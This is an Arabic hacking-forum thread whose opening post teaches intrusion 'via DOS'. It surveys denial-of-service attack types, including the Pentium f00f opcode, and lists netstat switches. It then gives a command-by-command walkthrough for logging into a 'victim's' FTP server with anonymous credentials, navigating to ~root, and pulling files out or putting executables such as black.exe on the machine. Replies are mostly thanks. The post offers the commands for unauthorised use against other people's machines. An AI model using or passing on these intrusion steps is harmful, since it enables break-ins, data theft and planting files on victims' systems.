اشترك في قناتنا ليصلك جديدنا

اشترك في قناتنا على اليوتيوب ليصلك جديدنا

كذلك الاعجاب بصفحتنا على الفيسبوك

درس هام لمن يريد الاختراق عن طريق الدوس.,....,

درس هام لمن يريد الاختراق عن طريق الدوس.,....,


النتائج 1 إلى 8 من 8

الموضوع: درس هام لمن يريد الاختراق عن طريق الدوس.,....,

  1. #1
    هكر نشيط Array الصورة الرمزية hatreck
    تاريخ التسجيل
    Jan 2013
    المشاركات
    121

    new درس هام لمن يريد الاختراق عن طريق الدوس.,....,



    السلام عليكم ورحة الله وبركاته
    الدرس طويل شوي مشان هيك سنبدا على بركة الله

    يوجد العديد من أنواع الهجوم DOS سوف أحاول أن أسردها باختصار:
    1-استهلاك عرض الحزمة Baud rate consumption

    حيث يقوم المهاجم باستهلاك كامل عرض الحزمة في نظام شبكة الضحية وذلك باغراق شبكة الضحية بكمية هائلة من الطلبات مثل: GET, SYN... وغيرها،

    مما يؤدي إلى استهلاك كامل عرض الحزمة وإيقاف الموقع المستهدف أو النظام المهاجم تماماً عن العمل، ويكون ذلك إما بالهجوم مباشرة Direct Attack

    حيث ينتصر في هذه الحالة من لديه عرض حزمة أكبر ( مثلاً 56-Kbps في مواجهة 128-Kbps )، أو القيام بربط العديد من المواقع من أجل إغراق نظام



    الضحية حيث يقوم المهاجم باستخدام أنظمة البث broadcast في شبكات أخرى من أجل تضخيم الهجوم، ويستفيد في هذه الحالة من عرض حزمة تلك الشبكة.


    من الجدير بالذكر في هذا الصدد أن برنامج الدرة من عمران يستخدم هذا النمط من الهجوم، على الرغم من أنني لم أقم بعد بتحليله كاملاً بعد، إلا أنني أستطيع

    القول من التحليل المبدئي على أنه يقوم بارسال طلبات GET حسب بروتوكول HTTP إلى النظام المستهدف وهو في هذه الحالة Web server مما يؤدي إلى

    زيادة الحمل على المزود المستهدف، يقوم البرنامج بذلك عن طريق إنشاء عدة Threads تعمل كل منها على أنها Process مستقلة تقوم بارسال طلبات

    GET المذكورة، إن فعالية هذا الهجوم قليلة حيث أن المستخدم مهما استخدم من عرض الحزمة لديه فلن يتمكن أبدا من مجاراة عرض حزمة المواقع الكبيرة،

    إلا أن القوة الحقيقية تكون عند التنسيق بين المئات أو الآلاف من مستخدمي هذا البرنامج بحيث يتم الهجوم على هدف محدد في وقت معين بدقة، وهذا مايقوم به

    برنامج الدرة حيث أنه يقوم بالاتصال بالموقع xxxxx.xxx (الموقع ليس سريا ويمكن بسهولة معرفته إلا أنني لن أذكره إلا إذا رغب عمران بذلك) ويحصل منه

    على أهداف الهجوم، ثم يقوم بالهجوم. (شكرا لـ [email protected] على تزودي بنسخة من برنامج الدرة).

    2-استهلاك الموارد: هذا النوع من الهجوم يعتمد على استهلاك الموارد في نظام الضحية عوضا عن استهلاك عرض الحزمة. أهم الموارد التي يتم استهدافها هي: CPU, Memory, Kernel, File system ... وغيرها، و يؤدي انخفاض الموارد في النظام إلى عدم استقراره وانهياره في نهاية الأمر.

    3- الثغرات البرمجية أو في مكونات النظام:


    لا يوجد نظام أو برنامج خالي تماماً من الثغرات مهما بلغت دقة تصميمه، يوجد عدة طرق لاستغلال هذه الثغرات مثلا بارسال Packets غير متوفقة مع المعايير


    القياسية لـ بروتركول TCP/IP المحددة من قبل RFC إلى نظام الضحية مما يؤدي إلى نتائج تختلف حسب نوع البرنامج من توقف الخدمة، أو توقف النظام، أو ضياع المعلومات، أو فيضان المكدس stack وغير ذلك.


    والأسوأ من هذا استخدام الثغرات الموجودة ضمن المكونات الصلبة للنظام Hardware مثل ثغرة Pentium f00f DOS الشهيرة، حيث يؤدي تنفيذ شفرة
    الآلة opcode التالية 0xf00fc7c8 على أنظمة تعتمد معالجات بنتيوم إلى توقف النظام عن العمل تماماً.

    لسوء الحظ لا يمكن الكشف عن هذا النوع من الثغرات إلا بعد وقوع الهجوم. ولا أحد يعلم تماماً فيما إن كانت هذه الثغرات موجودة عن طريق الخطأ أم أنها موضوعة هناك عن عمد لسبب ما...... ؟؟؟؟؟!!!!!!! الله أعلم

    كما يوجد أنواع أخرى من هجمات DOS إلا أنها أقل فعالية وغير مستخدمة على نطاق واسع.


    كنت أنوي أن أتحدث عن طرق الحماية من هجوم رفض الخدمة إلا أن الموضوع طويل ويحتاج إلى عدة مقالات لمناقشته، إلا أن المهم بالنسبة للمستخدم المنزلي هو إخفاء رقم IP الخاص به واستخدام أحد برامج الجدران النارية مثل ZoneAlarm, PcConseal ...وغيرها، وطبعا أخذ الحذر في مواقع المنتديات والدردشة وخاصة منتدى الشبكات والسيرفرات في موقع فلاشيات ;-)

    مايتطسع فعله netstat
    NETSTAT حالة الشبكة يظهر جميع المنافذ المتصلة
    NETSTAT مسافة-A يظهر ارقام الايبي المتصلة وحالتها
    NETSTAT مسافة-E يظهر حالة الشبكة بشكل عام
    NETSTAT مسافة-N يظهر ارقام البورتات والايبيات المتصلة
    NETSTAT مسافة-P يظهر البروتوكولات المتصلة بجهازك
    NETSTAT مسافة-R يظهر اجهزة الروترز في شبكتك
    NETSTAT مسافة-S يظهر حالة الشبكة والاجهزة المتصلة

    درس مهم لتعلم الاختراق بالtelnet
    http://www.nor2000.com/telnet.htm

    درس مهم لتعلم الاختراق بالnetbios
    http://www.nor2000.com/Logon.htm


    FTP
    أولا و لنجاح الإقتحام يجب ان يكون لدى الضحية البورت
    21
    مفتوح و هو البورت الخاص بــ
    FTP
    و لتأكد من أن البورت مفتوح عليك ان تستعمل برامج السكان و هي كثيرة و من احسنها
    Superscanne
    بعدما تتأكد ان البورت مفتوح ننتقل الى الخطوة الثانية و هي
    إضغط على
    Start
    ثم
    Run
    ثم اكتب
    ftp –n
    تطلع لك نافدة في الدوس مكتوب عليها
    FTP&g
    لحد هنا كل شيء تمام
    و بعدين اكتب
    Open
    ثم إضغط على
    إدخال
    Enter
    تتحصل عب النتيجة التالية
    FTP&g
    To
    أكتب جنب
    To
    رقم IP الضحية ثم إضغط على إدخال
    و الحين اهم جزء

    إدا تحصلت على هذا الرد فقد تخطيت خطوة
    Connected http://www.assassin.com/
    220 websrv1 Microsoft FTP Service (Version 4.0).
    و الآن أكتب الكتابة التالية
    ftp&gquote user ftp
    إدا تحصلت على هذا الرد فقد تخطيت خطوة
    331 Anonymous acces allowed, send identify (e-mail name) as password.
    و الآن أكتب الكتابة التالية
    ftp&gquote cwd ~root
    إدا تحصلت على هذا الرد فقد تخطيت خطوة
    530 Please login with USER and PASS
    ثم أكتب الكتابة التالية
    ftp&gquote pass ftp
    إدا تحصلت على هذا الرد فقد تخطيت خطوة
    و نجحت في الإقتحام يعني الاختراق

    230 Anonymous user logged in.
    مبرووووك انت الحين في جهاز المسكين ذا الي بتحوسه
    ما عليك الآن الا ان تقوم بإستعمال
    اوامر الفتيبي
    و طبعا لن امر عليها مرور الكرام لكي لا تقعو في المشكلة الي وقعت فيها و هي نجاح الإقتحام من دون ما أعرف و لا فكرة على اوامر الفتيبي و إذا اردتم ان تضحكو بقاليأكثر من 20 دقيقة و انا مجمد الإيدي و الضحية عالقة من دون أن أعمل أي شيء وعشان كذا
    قمت وجبت الاوامرعشان تطبقوها مباشرةا بعد نجاح الاختراق

    Pwd
    لكي تعر ما يحتويه الهارد ديسك
    Cd
    لإقتحام مجلد مثال
    Cd black
    في هدا المثال قمت بإقتحام مجلد المسمى بلاك
    Ls
    لكي يتضح لك محتوى المجلد أو الهارد ديسك
    Get
    لكي تحمل الى سطح المكتب بتاع جهازك
    مثال
    Get black.exe
    Put
    العملية الع**ية ل
    Get
    يعني ان تأخد ملف من سطح المكتب بتاع جهازك و تضعه في
    في جهاز الضحية
    مثال
    Put black.exe
    Clos
    لقطع الإتصال مع الضحية


    هذا أهم الأوامر والحين ابعلمكم على أنواع الرسائل الي نتحصل عليها من جهاز الضحية مع تطبيق الأوامر و شرحها و ارقامها
    Codes: Signification:
    110 Restart marker reply.
    120 Service ready in nnn minutes. (nnn est un temps)
    125 Data connection already open; transfer starting.
    150 File status oka about to open data connection.
    200 Command okay.
    202 Command not implemented, superfluous at this site.
    211 System status, or system help reply.
    212 Directory status.
    213 File status.
    214 Help message.
    215 NAME system type.
    220 Service ready for new user. 221 Service closing control connection.
    225 Data connection open; no transfer in progress.
    226 Closing data connection.
    227 Entering passive mode (h1, h2, h3, h4, p1, p2).
    230 User logged in, proceed.
    250 Requested file action okay, completed.
    257 "PATHNAME" created.
    331 User name okay, need password.
    332 Need account for login.
    350 Requested file action pendingfurther information.
    421 Service not available, closing control connection.
    425 Can't open data connection.
    426 Connection closed; transfer aborded.
    450 Requested file action not taken. (Fichier déjà utilisé par autre chose)
    451 Requested action aborded: local error processing.
    452 Requested action not taken. (Pas assez de mémoire pour exécuter l'action)
    500 Syntax error, command unrecognized.
    501 Syntax error in parameters or arguments.
    502 Command not implemented.
    503 Bad sequence of commands.
    504 Command not implemented for that parameter.
    530 Not logged in.
    532 Need account for storing files.
    550 Requested action not taken. (Fichier non trouvé, pas d'accès possible,...)
    551 Requested action aborded: page type unknown.
    552 Requested file action aborded.
    553 Requested action not taken. (Nom de fichier non attribué).
    يتبع في الصفحة الجاية . [img]file:///D:/هاكرز/معلومات/الاختراق%20عن%20طريق%20الدوس(2) %20-%20Powered%20by%20VBZooM_files/s8.gif[/img]



  2. #2
    هكر مجتهد Array
    تاريخ التسجيل
    Dec 2012
    المشاركات
    475

    افتراضي رد: درس هام لمن يريد الاختراق عن طريق الدوس.,....,

    و منكم نستفيد, مشكور


  3. #3
    هكر مجتهد Array الصورة الرمزية عثمان هكر مغربي
    تاريخ التسجيل
    Feb 2013
    الدولة
    في قلب من يحبني
    المشاركات
    273

    افتراضي رد: درس هام لمن يريد الاختراق عن طريق الدوس.,....,

    مشكووور أخي

    بارك الله فيك



  4. #4
    هكر متميز Array الصورة الرمزية ahmedfreed
    تاريخ التسجيل
    Nov 2012
    الدولة
    iraq
    المشاركات
    1,793

    افتراضي رد: درس هام لمن يريد الاختراق عن طريق الدوس.,....,

    مشكور بارك الله فيك


  5. #5
    هكر مبتديء Array الصورة الرمزية hacker4 dz
    تاريخ التسجيل
    Feb 2013
    الدولة
    algeria
    المشاركات
    13

    افتراضي رد: درس هام لمن يريد الاختراق عن طريق الدوس.,....,

    مشكور يا غالي


  6. #6
    هكر متميز Array الصورة الرمزية Mr.JnOoN
    تاريخ التسجيل
    May 2012
    الدولة
    JORDAN
    المشاركات
    1,465

    افتراضي رد: درس هام لمن يريد الاختراق عن طريق الدوس.,....,

    شكرآ لك لاكن ينقصك التنسيق
    طريقة قديمة اخي
    لاكن شكرآ لك على الطرح
    --------------------------
    بالتوفيق



  7. #7
    هكر مجتهد Array الصورة الرمزية xtreme hacker
    تاريخ التسجيل
    Dec 2012
    المشاركات
    505

    افتراضي رد: درس هام لمن يريد الاختراق عن طريق الدوس.,....,

    شكرا اخي بارك الله فيك موضوع يفيد اكثر من يريد ان يعرف كيف كان يتم الاختراق عن طريق الدوس و كذلك الاوامر التي تساعده في ذلك شكرا موفق .. ..


  8. #8
    هكر مجتهد Array الصورة الرمزية boda_hackr
    تاريخ التسجيل
    Dec 2012
    الدولة
    no_ip
    المشاركات
    520

    افتراضي رد: درس هام لمن يريد الاختراق عن طريق الدوس.,....,

    شكرا لك اخى مبدع لك جزير الشكر


المواضيع المتشابهه

  1. فتح بورت عن طريق الدوس
    بواسطة GhoOost في المنتدى منتدى الإختراق العام
    مشاركات: 38
    آخر مشاركة: 01-25-2013, 02:15 AM
  2. الاختراق عن طريق الدوس 100%
    بواسطة didorahim في المنتدى منتدى الإختراق العام
    مشاركات: 57
    آخر مشاركة: 08-27-2012, 02:00 PM
  3. الإختراق عن طريق الدوس
    بواسطة ASDELY-ScOrPiOn في المنتدى منتدى الإختراق العام
    مشاركات: 29
    آخر مشاركة: 01-30-2012, 05:22 AM

وجد الزوار هذه الصفحة بالبحث عن:

الاختراق عن طريق الدوس

اختراق الفيس بوك عن طريق الدوس

اختراق الفيس بوك بالدوس

فتح موقع الفيس بوك من خلال دوس

اختراق الاجهزة عن طريق الدوس 2013

طريقة الاختراق عن طريق الدوس

الاختراق عن طريق ftp

الاختراق بالدوس 2013

مشكلة choose one. to set baud rate to download

اختراق الفيس بوك عن طريق الدوس 2013

إختراق الفيس بوك عن طريق الدوساختراق جهاز عن طريق الدوس ضمن الشبكهالاختراق عن طريق الدوس جيوش الهكراختراق الاجهزة المتصلة بالشبكة بالدوساختراق داخل الشبكة دوس ipاختراق من في الشبكة بالدوساختراق الفيس بوك عن طريق الدوس site:www.aljyyosh.comاختراق الفيس بوك عن طريق الدوس بالصوراختراق الفيس بوك من دوسكشف التلغيم عن طريق الدوسكيفية فتح الماقع المحجوبة بنظام الدوساختراق فيس بوك عن طريق الدوساختراق فيس بوك بالدوس ftpالإختراق عن طريق الدوساختراق الفيس بوك عن طريق excuter

المفضلات

أذونات المشاركة

  • لا تستطيع إضافة مواضيع جديدة
  • لا تستطيع الرد على المواضيع
  • لا تستطيع إرفاق ملفات
  • لا تستطيع تعديل مشاركاتك
  •